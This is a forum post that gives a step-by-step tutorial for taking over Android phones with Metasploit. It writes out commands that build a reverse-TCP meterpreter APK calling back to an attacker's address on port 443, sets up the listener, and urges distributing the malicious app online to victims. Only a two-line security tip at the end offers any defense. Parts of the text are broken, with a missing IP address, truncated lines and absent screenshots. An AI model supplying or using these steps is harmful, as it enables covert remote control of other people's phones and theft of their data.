How To Hack Android Device

Go down

How To Hack Android Device

Post by Dam_berrypromzy on Sat Mar 25, 2017 12:04 am

Nowadays mobile users are increasing day
by day, the security threat is also increasing
together w...
Nowadays mobile users are increasing day
by day, the security threat is also increasing
together with the growth of its users. Our
tutorial for today is how to Hacking Android
Smartphone Tutorial using Metasploit. Why
we choose android phone for this tutorial?
simply because lately android phone
growing very fast worldwide. Here in China
you can get android phone for only US$ 30
it's one of the reason why android growing
What is android? according to wikipedia:
Android is an operating system based on
the Linux kernel, and designed primarily for
touchscreen mobile devices such as
smartphones and tablet computers. Initially
developed by Android, Inc., which Google
backed financially and later bought in 2005,
Android was unveiled in 2007 along with
the founding of the Open Handset Alliance:
a consortium of hardware, software, and
telecommunication companies devoted to
advancing open standards for mobile
andwhat is APK? according to wikipedia:
Android application package file (APK) is the
file format used to distribute and install
application software and middleware onto
Google's Android operating system; very
similar to an MSI package in Windows or a
Deb package in Debian-based operating
systems like Ubuntu.
Here is some initial information for this
Attacker IP address:
Attacker port to receive connection: 443
1. Metasploit framework (we use kali
Linux /1.0.6 in this tutorial)
2. Android smartphone (we use HTC One
android 4.4 KitKat)
Step by Step Hacking Android Smartphone
Tutorial using Metasploit:
1. Open terminal (CTRL ALT T) view tutorial
how to create linux keyboard shortcut.
2. We will utilize Metasploit payload
framework to create exploit for this tutorial.
msfpayload android/meterpreter/
reverse_tcp LHOST=<attacker_ip_address>
As described above that attacker IP address
is, below is our screenshot
when executed the command
3. Because our payload is reverse_tcp
where attacker expect the victim to connect
back to attacker machine, attacker needs to
set up the handler to handle incoming
connections to the port already specified
above. Type msfconsole to go to Metasploit
use exploit/multi/handler –> we will use
Metasploit handler set payload android/
meterpreter/reverse_tcp –> make sure the
payload is the same with step 2
4. The next step we need to configure the
switch for the Metasploit payload we
already specified instep 3.
set lhost –> attacker IP
address set lport 443 –> port to listen the
reverse connection exploit –> start to listen
incoming connection
5.Attacker already have the APK's file and
now he will start distribute it (I don't need
to describe how to distribute this file,
internet is the good place for distribution.
6.Short stories the victim (me myself)
download the malicious APK's file and install
it. After victim open the application, attacker
Metasploit console get something like this:
7.It's mean that attacker already inside the
victim android smartphone and he can do
everything with victim phone
1. Don't install APK's from the unknown
2. If you really want to install APK's from
unknown source, make sure you can view,
read and examine the source code.


Posts : 20
Join date : 2017-03-18
Age : 28
Location : Lagos

View user profile

Back to top Go down

Back to top

- Similar topics

Permissions in this forum:
You cannot reply to topics in this forum